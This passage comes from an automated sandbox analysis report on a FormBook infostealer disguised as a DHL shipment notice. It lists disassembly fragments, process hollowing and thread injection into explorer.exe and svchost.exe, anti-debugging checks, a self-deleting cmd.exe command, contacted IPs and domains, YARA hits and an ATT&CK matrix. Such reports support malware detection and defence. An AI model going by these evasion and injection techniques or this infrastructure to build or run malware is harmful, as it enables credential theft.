          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F0EA5 mov eax, dword ptr fs:[00000030h]17_2_030F0EA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A46A7 mov eax, dword ptr fs:[00000030h]17_2_030A46A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03068EC7 mov eax, dword ptr fs:[00000030h]17_2_03068EC7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030536CC mov eax, dword ptr fs:[00000030h]17_2_030536CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030DFEC0 mov eax, dword ptr fs:[00000030h]17_2_030DFEC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F8ED6 mov eax, dword ptr fs:[00000030h]17_2_030F8ED6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030376E2 mov eax, dword ptr fs:[00000030h]17_2_030376E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030516E0 mov ecx, dword ptr fs:[00000030h]17_2_030516E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302AD30 mov eax, dword ptr fs:[00000030h]17_2_0302AD30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EE539 mov eax, dword ptr fs:[00000030h]17_2_030EE539
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F8D34 mov eax, dword ptr fs:[00000030h]17_2_030F8D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030AA537 mov eax, dword ptr fs:[00000030h]17_2_030AA537
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03054D3B mov eax, dword ptr fs:[00000030h]17_2_03054D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03054D3B mov eax, dword ptr fs:[00000030h]17_2_03054D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03054D3B mov eax, dword ptr fs:[00000030h]17_2_03054D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03063D43 mov eax, dword ptr fs:[00000030h]17_2_03063D43
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A3540 mov eax, dword ptr fs:[00000030h]17_2_030A3540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030D3D40 mov eax, dword ptr fs:[00000030h]17_2_030D3D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03047D50 mov eax, dword ptr fs:[00000030h]17_2_03047D50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304C577 mov eax, dword ptr fs:[00000030h]17_2_0304C577
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304C577 mov eax, dword ptr fs:[00000030h]17_2_0304C577
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052581 mov eax, dword ptr fs:[00000030h]17_2_03052581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052581 mov eax, dword ptr fs:[00000030h]17_2_03052581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052581 mov eax, dword ptr fs:[00000030h]17_2_03052581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052581 mov eax, dword ptr fs:[00000030h]17_2_03052581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03022D8A mov eax, dword ptr fs:[00000030h]17_2_03022D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03022D8A mov eax, dword ptr fs:[00000030h]17_2_03022D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03022D8A mov eax, dword ptr fs:[00000030h]17_2_03022D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03022D8A mov eax, dword ptr fs:[00000030h]17_2_03022D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03022D8A mov eax, dword ptr fs:[00000030h]17_2_03022D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305FD9B mov eax, dword ptr fs:[00000030h]17_2_0305FD9B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305FD9B mov eax, dword ptr fs:[00000030h]17_2_0305FD9B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F05AC mov eax, dword ptr fs:[00000030h]17_2_030F05AC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F05AC mov eax, dword ptr fs:[00000030h]17_2_030F05AC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030535A1 mov eax, dword ptr fs:[00000030h]17_2_030535A1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03051DB5 mov eax, dword ptr fs:[00000030h]17_2_03051DB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03051DB5 mov eax, dword ptr fs:[00000030h]17_2_03051DB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03051DB5 mov eax, dword ptr fs:[00000030h]17_2_03051DB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6DC9 mov eax, dword ptr fs:[00000030h]17_2_030A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6DC9 mov eax, dword ptr fs:[00000030h]17_2_030A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6DC9 mov eax, dword ptr fs:[00000030h]17_2_030A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6DC9 mov ecx, dword ptr fs:[00000030h]17_2_030A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6DC9 mov eax, dword ptr fs:[00000030h]17_2_030A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6DC9 mov eax, dword ptr fs:[00000030h]17_2_030A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303D5E0 mov eax, dword ptr fs:[00000030h]17_2_0303D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303D5E0 mov eax, dword ptr fs:[00000030h]17_2_0303D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EFDE2 mov eax, dword ptr fs:[00000030h]17_2_030EFDE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EFDE2 mov eax, dword ptr fs:[00000030h]17_2_030EFDE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EFDE2 mov eax, dword ptr fs:[00000030h]17_2_030EFDE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EFDE2 mov eax, dword ptr fs:[00000030h]17_2_030EFDE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030D8DF1 mov eax, dword ptr fs:[00000030h]17_2_030D8DF1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6C0A mov eax, dword ptr fs:[00000030h]17_2_030A6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6C0A mov eax, dword ptr fs:[00000030h]17_2_030A6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6C0A mov eax, dword ptr fs:[00000030h]17_2_030A6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6C0A mov eax, dword ptr fs:[00000030h]17_2_030A6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F740D mov eax, dword ptr fs:[00000030h]17_2_030F740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F740D mov eax, dword ptr fs:[00000030h]17_2_030F740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F740D mov eax, dword ptr fs:[00000030h]17_2_030F740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305BC2C mov eax, dword ptr fs:[00000030h]17_2_0305BC2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305A44B mov eax, dword ptr fs:[00000030h]17_2_0305A44B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BC450 mov eax, dword ptr fs:[00000030h]17_2_030BC450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BC450 mov eax, dword ptr fs:[00000030h]17_2_030BC450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304746D mov eax, dword ptr fs:[00000030h]17_2_0304746D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303849B mov eax, dword ptr fs:[00000030h]17_2_0303849B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F8CD6 mov eax, dword ptr fs:[00000030h]17_2_030F8CD6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E14FB mov eax, dword ptr fs:[00000030h]17_2_030E14FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6CF0 mov eax, dword ptr fs:[00000030h]17_2_030A6CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6CF0 mov eax, dword ptr fs:[00000030h]17_2_030A6CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6CF0 mov eax, dword ptr fs:[00000030h]17_2_030A6CF0
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0040ACE0 LdrLoadDll,2_2_0040ACE0
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D743CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00D743CC
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D7439B SetUnhandledExceptionFilter,1_2_00D7439B
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00D743CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D743CC
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00D7439B SetUnhandledExceptionFilter,2_2_00D7439B

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ultrakill.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 142.250.185.115 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.rtpholywin99.com
          Source: C:\Windows\explorer.exeDomain query: www.keilaniclothing.com
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 2F0000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeThread register set: target process: 3616Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 3616Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeProcess created: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnokJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\aeokw.exe"Jump to behavior
          Source: explorer.exe, 00000005.00000000.284344816.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.290054860.0000000005E60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.342712114.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.299103436.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.284344816.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.342712114.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.284344816.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.342712114.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.263202422.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager,
          Source: explorer.exe, 00000005.00000000.284344816.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.342712114.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.263202422.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D73283 cpuid 1_2_00D73283
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D73EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00D73EC8
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403646

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API          		Path Interception1
          Access Token Manipulation          		1
          Rootkit          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Credential API Hooking          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts512
          Process Injection          		2
          Virtualization/Sandbox Evasion          		LSASS Memory151
          Security Software Discovery          		Remote Desktop Protocol1
          Archive Collected Data          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Access Token Manipulation          		Security Account Manager2
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Clipboard Data          		Automated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
          Process Injection          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information          		Cached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Software Packing          		DCSync114
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 626119 Sample: DHL SHIPMENT NOTIFICATION 1... Startdate: 13/05/2022 Architecture: WINDOWS Score: 100 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Antivirus detection for URL or domain 2->51 53 5 other signatures 2->53 11 DHL SHIPMENT NOTIFICATION 1146789443.exe 19 2->11         started        process3 file4 31 C:\Users\user\AppData\Local\Temp\aeokw.exe, PE32 11->31 dropped 14 aeokw.exe 11->14         started        process5 signatures6 65 Tries to detect virtualization through RDTSC time measurements 14->65 17 aeokw.exe 14->17         started        process7 signatures8 39 Modifies the context of a thread in another process (thread injection) 17->39 41 Maps a DLL or memory area into another process 17->41 43 Sample uses process hollowing technique 17->43 45 Queues an APC in another process (thread injection) 17->45 20 explorer.exe 17->20 injected process9 dnsIp10 33 shops.myshopify.com 23.227.38.74, 49775, 80 CLOUDFLARENETUS Canada 20->33 35 www.ultrakill.xyz 3.64.163.50, 49777, 80 AMAZON-02US United States 20->35 37 3 other IPs or domains 20->37 55 System process connects to network (likely due to code injection or exploit) 20->55 57 Performs DNS queries to domains with low reputation 20->57 24 svchost.exe 20->24         started        signatures11 process12 signatures13 59 Modifies the context of a thread in another process (thread injection) 24->59 61 Maps a DLL or memory area into another process 24->61 63 Tries to detect virtualization through RDTSC time measurements 24->63 27 cmd.exe 1 24->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          DHL SHIPMENT NOTIFICATION 1146789443.exe43%VirustotalBrowse
          DHL SHIPMENT NOTIFICATION 1146789443.exe49%ReversingLabsWin32.Trojan.FormBook
          DHL SHIPMENT NOTIFICATION 1146789443.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.0.aeokw.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.aeokw.exe.12a0000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.aeokw.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.aeokw.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.aeokw.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
